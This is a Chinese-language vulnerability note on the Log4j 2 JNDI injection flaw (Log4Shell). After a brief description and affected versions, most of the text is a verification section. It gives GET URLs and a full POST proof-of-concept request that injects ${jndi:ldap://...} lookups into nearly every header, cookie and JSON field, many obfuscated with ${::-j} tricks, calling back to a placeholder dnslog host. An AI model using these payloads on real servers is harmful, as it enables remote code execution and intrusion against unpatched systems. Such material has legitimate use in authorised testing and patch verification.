漏洞描述:
当用户输入信息时,应用程序中的log4j 2组件会将信息记录到日志中
假如日志中包含有语句${jndi:ldap:attacker:1099/exp},log4j就会去解析该信息,通过jndi的lookup() 方法去解析该url:ldap:attacker:1099/exp
受害主机访问伪造的ldap服务,访问恶意java.class类,执行恶意代码。如果ldap没有解析成功会自动访问http
影响范围:
Apache Log4j 2.x <= 2.14
条件:lookup()参数可控
漏洞验证:
1.get方式:
http://www.xxxx.cn/solr/admin/cores?action=${jndi:ldap://${sys:java.version}. xxxx.dnslog.cn }
http://www.xxx.cn/col/col3513?action=${jndi:ldap://${sys:java.version}.xxxx.dnslog.cn}
2.post方式:
poc
POST / HTTP/1.1
Host: www.xxxx.cn
Accept-Language: ${jndi:ldap://xxxx.dnslog.cn}
Accept: ${jndi:ldap://xxxx.dnslog.cn}
User-Agent: Mozilla ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/}
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Connection: keep-alive
Referer: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/a}
Cache-Control: max-age=0
Abc: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/a}
Forwarded: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/a}
X-Remote-Addr: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/a}
X-Client-Ip: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/a}
X-Wap-Profile: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/a}
Cookie: ${jndi:ldap://xxxx.dnslog.cn}=${jndi:ldap://xxxx.dnslog.cn};JSESSIONID=${jndi:ldap://xxxx.dnslog.cn};SESSIONID=${jndi:ldap://xxxx.dnslog.cn};PHPSESSID=${jndi:ldap://xxxx.dnslog.cn};token=${jndi:ldap://xxxx.dnslog.cn/vulscan};session=${jndi:ldap://xxxx.dnslog.cn}
X-Remote-Ip: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/a}
True-Client-Ip: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/a}
X-Api-Version: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/a}
Cf-Connecting_ip: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/a}
Contact: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/a}
X-Originating-Ip: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/a}
Client-Ip: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/a}
X-Forwarded-For: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/a}
If-Modified-Since: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/a}
X-Real-Ip: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/a}
Originating-Ip: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/a}
Content-Type: application/json
Content-Length: 857
{"username": "${jndi:ldap://xxxx.dnslog.cn}", "account": "${jndi:ldap://xxxx.dnslog.cn}", "uid": "${jndi:ldap://xxxx.dnslog.cn}", "passwd": "${jndi:ldap://xxxx.dnslog.cn}", "userPassword": "${jndi:ldap://xxxx.dnslog.cn}", "pass": "${jndi:ldap://xxxx.dnslog.cn}", "email": "${jndi:ldap://xxxx.dnslog.cn}", "phone": "${jndi:ldap://xxxx.dnslog.cn}", "pwd": "${jndi:ldap://xxxx.dnslog.cn}", "id": "${jndi:ldap://xxxx.dnslog.cn}", "user": "${jndi:ldap://xxxx.dnslog.cn}", "login_password": "${jndi:ldap://xxxx.dnslog.cn}", "login_username": "${jndi:ldap://xxxx.dnslog.cn}", "userAccount": "${jndi:ldap://xxxx.dnslog.cn}", "password": "${jndi:ldap://xxxx.dnslog.cn}", "email_address": "${jndi:ldap://xxxx.dnslog.cn}", "payload": "${jndi:ldap://xxxx.dnslog.cn}"}
发送请求
DNSlog发送响应信息: